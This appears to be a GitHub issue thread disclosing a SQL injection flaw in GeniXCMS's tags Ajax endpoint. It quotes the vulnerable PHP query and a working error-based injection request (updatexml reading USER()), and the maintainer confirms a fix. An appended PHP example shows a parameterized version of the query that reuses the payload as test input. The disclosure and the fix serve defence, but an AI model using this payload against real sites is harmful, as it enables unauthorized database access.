safety problem #60

Closed
l3m0n opened this issue Jan 6, 2017 · 4 comments

l3m0n commented Jan 6, 2017

/inc/lib/Control/Ajax/tags-ajax.control.php

    if (isset($_GET['token']) && Token::isExist($_GET['token'])) {
        if (User::access(2)) {
            $tags = Db::result(
                "SELECT * FROM `cat` WHERE `type` = 'tag' AND `name` LIKE '".$_GET['term']."%' ORDER BY `name` ASC"
            );

I think you know this.

    public static $group = array(
        '0' => ADMINISTRATOR,
        '1' => SUPERVISOR,
        '2' => EDITOR,
        '3' => AUTHOR,
        '4' => CONTRIBUTOR,
        '5' => VIP_MEMBER,
        '6' => GENERAL_MEMBER, );

But it needs editor.

This is my exp:
GET /code-src/GeniXCMS/GeniXCMS-master/?ajax=tags&token=vv4lHNZit2KJUJEIqUKn3S1CRvr5Wb8smp6ir3ujyj7iijC6t0GvfpLgSW0a3xGicHSXTH6IW1BCeUlt&term=a'%20and%20updatexml(1,(select+USER()),1)%23

semplon self-assigned this Jan 7, 2017

semplon (Collaborator) commented Jan 7, 2017

Thank you for reporting this. I'll fix this on the next commit.

l3m0n (Author) commented Jan 8, 2017

You're welcome. In fact, I would like to apply for a CVE, I do not know this?

semplon (Collaborator) commented Jan 8, 2017

@l3m0n to request a CVE, please do this step: https://cve.mitre.org/cve/request_id.html

semplon pushed a commit that referenced this issue Jan 8, 2017
Filter Categories for Tags
Change $url position to correct location at Comments.class.php
Add Author Pages
#60 Security Fix Issue
Change Ajax URL Router format
Change Ajax, Mods router scrapper

semplon (Collaborator) commented Jan 8, 2017

This issue is fixed.

semplon closed this as completed Jan 8, 2017
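
The query quoted in the report concatenates `$_GET['term']` into a `LIKE` clause. The following is an added example (not GeniXCMS code and not the fix from the referenced commit) of the same tag lookup with a bound parameter and escaped `LIKE` wildcards. It assumes PDO with an in-memory SQLite table in place of the project's `Db` class; `findTags()` and `escapeLike()` are hypothetical names.

```php
<?php
// Added example, not project code. PDO + SQLite stand in for the Db class;
// findTags() and escapeLike() are hypothetical helper names.

// Escape LIKE metacharacters so the term cannot widen the match with % or _.
// '!' is the escape character; it is escaped first by being in the same map.
function escapeLike(string $term): string
{
    return strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);
}

// Prefix search on tag names with the term bound as a parameter,
// never concatenated into the SQL text.
function findTags(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare(
        "SELECT name FROM cat WHERE type = 'tag' AND name LIKE :term ESCAPE '!' ORDER BY name ASC"
    );
    $stmt->execute([':term' => escapeLike($term) . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE cat (name TEXT, type TEXT)");

// Constructed sample rows.
$insert = $pdo->prepare("INSERT INTO cat (name, type) VALUES (?, 'tag')");
foreach (['apple', 'apricot', 'a%b', 'banana'] as $name) {
    $insert->execute([$name]);
}

// Constructed inputs: a normal prefix, the URL-decoded term from the report,
// and a term containing a literal LIKE wildcard.
$terms = [
    'ap',
    "a' and updatexml(1,(select USER()),1)#",
    'a%',
];

foreach ($terms as $term) {
    // Every term reaches the database as data and is only compared to tag names.
    echo json_encode($term), ' => ', json_encode(findTags($pdo, $term)), PHP_EOL;
}
```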